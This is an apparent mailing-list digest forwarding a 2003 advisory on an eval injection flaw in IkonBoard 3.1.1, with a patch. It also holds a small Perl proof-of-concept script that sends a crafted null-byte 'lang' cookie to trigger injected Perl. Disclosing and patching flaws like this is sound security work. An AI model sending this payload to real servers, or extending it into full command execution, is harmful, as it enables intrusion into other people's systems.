[Please upgrade if you use IkonBoard. As I said earlier, I'm not posting security issues in PHP-based portal systems anymore since there are just too many of them. However, this one's Perl for a change -- Raju]
This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="qMm9M+Fa2AknHoGS" Content-Disposition: inline Message-ID: <[EMAIL PROTECTED]> From: Nick Cleaton <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: IkonBoard v3.1.1: arbitrary command execution Date: Tue, 1 Apr 2003 17:49:38 +0100 --qMm9M+Fa2AknHoGS Content-Type: text/plain; charset=us-ascii Content-Disposition: inline ============================================================================ Vulnerable: IkonBoard 3.1.1 (and probably earlier) Category: Perl/CGI coding errors Impact: Arbitrary command execution Date: 1st April 2003 Vendor: The Jarvis Group Homepage: http://www.ikonboard.com/ Vendor Status: First notified 26th January 2003 Vendor Fix: None available Details ======= IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script. There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands. The flaw is in the code that cleans up the value of the 'lang' cookie, in sub LoadLanguage in Sources/Lib/FUNC.pm: # Make sure the cookie data is legal if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) { $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/; } If the cookie contains illegal characters then the s/// operation fails to match and the bad cookie value is left in place, so this code fails to do any validation. The cookie value is then interpolated into a directory name, which is in turn interpolated into a string passed to the eval function. There is a check that the directory exists, but use of the poisoned null technique allows that check to be bypassed. Suggested Fix ============= Either apply the attached patch to Sources/Lib/FUNC.pm on the web server, or make the following changes by hand: At line 104 of Sources/Lib/FUNC.pm is the code: $sid =~ s/^(\d+)$/$1/; ... change it to: $sid =~ s/^(\d+)$/$1/ or die 'bad sid cookie value'; At line 191 of Sources/Lib/FUNC.pm is the code: $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/; ... change it to: $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/ or die 'bad lang cookie value'; Exploit ======= The following proof of concept exploit demonstrates that the problem is exploitable by causing a syntax error in the eval(). The Perl syntax error message in the returned HTML proves that the exploit has been able to inject Perl source code into the eval. I have refrained from publishing a more functional exploit at this time, to delay attacks against IkonBoard installations. Note however that it would take only a few minutes for a reasonably knowledgeable attacker to write an exploit that runs arbitrary Perl. ----- cut here ----- #!/usr/bin/perl -w use strict; my $HOST = 'www.example.domain'; my $PATH = '/cgi-bin/ikonboard.cgi'; use IO::Socket; my $sock = IO::Socket::INET->new("$HOST:80") or die "connect: $!"; $sock->print(<<END) or die "write: $!"; GET $PATH HTTP/1.1 Host: $HOST Cookie: lang=%2E%00%22 Connection: close END print while <$sock>; ----- cut here ----- ============================================================================ -- Nick Cleaton [EMAIL PROTECTED] --qMm9M+Fa2AknHoGS Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="patch.txt" diff -Nurd Sources.orig/Lib/FUNC.pm Sources/Lib/FUNC.pm --- Sources.orig/Lib/FUNC.pm Sun Jul 14 00:47:08 2002 +++ Sources/Lib/FUNC.pm Mon Feb 3 09:39:48 2003 @@ -101,7 +101,7 @@ my $sid = $iB::IN{'sid'} || $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'skin'}; # Make sure it only contains a number - $sid =~ s/^(\d+)$/$1/; + $sid =~ s/^(\d+)$/$1/ or die "invalid sid value"; # Make sure we have a default skin set @@ -188,7 +188,8 @@ # Make sure the cookie data is legal if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) { - $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/; + $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ s/^([\d\w]+)$/$1/ + or die "invalid lang cookie value"; } $default = $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} --qMm9M+Fa2AknHoGS-- ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ It is the mind that moves ================================================ To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject header. Check archives at http://www.mail-archive.com/ilugd%40wpaa.org
